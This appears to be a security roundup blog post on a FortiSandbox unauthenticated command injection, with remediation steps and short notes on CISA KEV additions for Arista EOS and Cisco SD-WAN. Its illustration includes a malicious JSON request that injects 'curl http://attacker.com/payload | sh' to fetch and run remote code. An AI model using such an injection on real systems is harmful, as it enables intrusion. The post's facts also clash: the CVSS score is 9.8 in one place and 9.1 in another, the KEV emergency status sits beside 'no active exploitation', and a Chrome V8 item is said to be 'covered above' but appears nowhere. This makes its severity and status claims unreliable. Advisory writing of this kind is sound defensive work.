CVE-2026-25089: FortiSandbox Unauthenticated RCE + CISA KEV June 9 Additions (Arista, Cisco SD-WAN)
Technical root cause for the unauthenticated OS command injection vulnerability in Fortinet FortiSandbox appliances.
CVE-2026-25089
Severity: CVSS 9.8
Status: CISA KEV Emergency Addition
Target Component: Fortinet FortiSandbox
This post is part of the Week of June 12, 2026 Security Roundup.
Part 1: CVE-2026-25089 — FortiSandbox Unauthenticated OS Command Injection (CVSS 9.1)
Vulnerability Overview
CVE-2026-25089 is a critical OS command injection (CWE-78) in the FortiSandbox Web UI. The vulnerability exists in the "start VNC" feature of the GUI, where specially crafted JSON input triggers a second-order command injection, allowing an unauthenticated remote attacker to execute arbitrary OS commands as root on the underlying system.
CVE: CVE-2026-25089
CVSS v3.1: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-78 (OS Command Injection)
Advisory: FG-IR-26-141 (Fortinet, June 9, 2026)
Discovery: Adham El Karn, Fortinet Product Security Team
Active exploitation: None reported at time of writing
Affected Versions
- FortiSandbox 5.0.0 – 5.0.5 → fix: 5.0.6
- FortiSandbox 4.4.0 – 4.4.8 → fix: 4.4.9
- FortiSandbox 4.2.x (all) → upgrade required
- FortiSandbox Cloud 5.0.4 – 5.0.5 → fix: Cloud 5.0.6
- FortiSandbox PaaS 5.0.4 – 5.0.5 → fix: PaaS 5.0.6
Technical Analysis
The vulnerability is a second-order command injection. The "start VNC" endpoint in the FortiSandbox Web UI accepts JSON parameters including a session identifier or hostname field. This value is insufficiently sanitized before being passed to a shell command within the application's backend process. By injecting shell metacharacters (;, |, $(...), backticks) into the JSON field, an attacker can inject arbitrary commands that execute when the backend processes the request.
# Simplified illustration of the vulnerability class (not working exploit):
# Normal request:
POST /api/v1/sandbox/vnc/start
{"session_id": "abc123"}
# Malicious request:
POST /api/v1/sandbox/vnc/start
{"session_id": "abc123; curl http://attacker.com/payload | sh #"}
# Backend (vulnerable pseudocode):
os.system(f"start-vnc-session {session_id}") # session_id is unsanitized
Remediation
# Step 1: Identify your FortiSandbox version
# Via FortiSandbox CLI:
get system status | grep Version
# Step 2: Upgrade to fixed version
# FortiSandbox 5.0.6: https://support.fortinet.com/
# FortiSandbox 4.4.9: https://support.fortinet.com/
# Step 3: Workaround (if immediate upgrade is not possible)
# Restrict web UI access to management networks only:
config system admin setting
set access-protocol https
set http-redirect enable
end
# Apply ACL to management interface to restrict source IPs
# Step 4: Verify your installation post-patch
get system status | grep "FortiSandbox"
# Confirm version shows 5.0.6, 4.4.9, or later
Part 2: CISA KEV Additions — June 9, 2026
CISA added three vulnerabilities to the Known Exploited Vulnerabilities catalog on June 9, 2026. FCEB agencies have until June 23, 2026 to remediate.
CVE-2026-7473 — Arista EOS Incomplete Comparison Vulnerability
Arista's Extensible Operating System (EOS) contains an incomplete comparison vulnerability (CWE-697) that can be exploited by an attacker with network access to the management interface. Network operators: consult Arista's June 2026 Security Advisory for affected EOS versions and patch instructions. Upgrade EOS via show version → install source workflow on your Arista devices.
CVE-2026-11645 — Google Chromium V8 OOB (covered above)
See the Chrome V8 Zero-Day deep-dive for full technical analysis.
CVE-2026-20245 — Cisco Catalyst SD-WAN Manager Improper Output Encoding
An improper encoding or escaping of output (CWE-116) in Cisco Catalyst SD-WAN Manager allows an authenticated attacker to inject malicious content. If SD-WAN Manager is internet-facing (not recommended), this becomes a higher-priority patch. Consult Cisco Security Advisory for affected SD-WAN Manager versions and upgrade paths.
# Arista EOS: check version and available patches
show version
# Then upgrade via:
# bash sudo install source aboot://EOS-x.y.z.swi
# Cisco SD-WAN Manager: check version
show sdwan version
# Apply patches per Cisco Security Advisory
# Use Cisco's standard firmware upgrade workflow via vManage UI
Additional June 2026 Vendor Patches
Ivanti: Multiple critical vulnerabilities patched in Ivanti Connect Secure and Ivanti Policy Secure. Ivanti products have been a persistent target in 2026; apply patches immediately and review your Ivanti deployment for signs of prior compromise using Ivanti's Integrity Checker Tool (ICT).
SAP: June 2026 Security Patch Day addressed multiple critical vulnerabilities including authentication bypass and remote code execution issues in SAP NetWeaver and related components. Follow SAP ONE Support Launchpad for patch deployment guidance.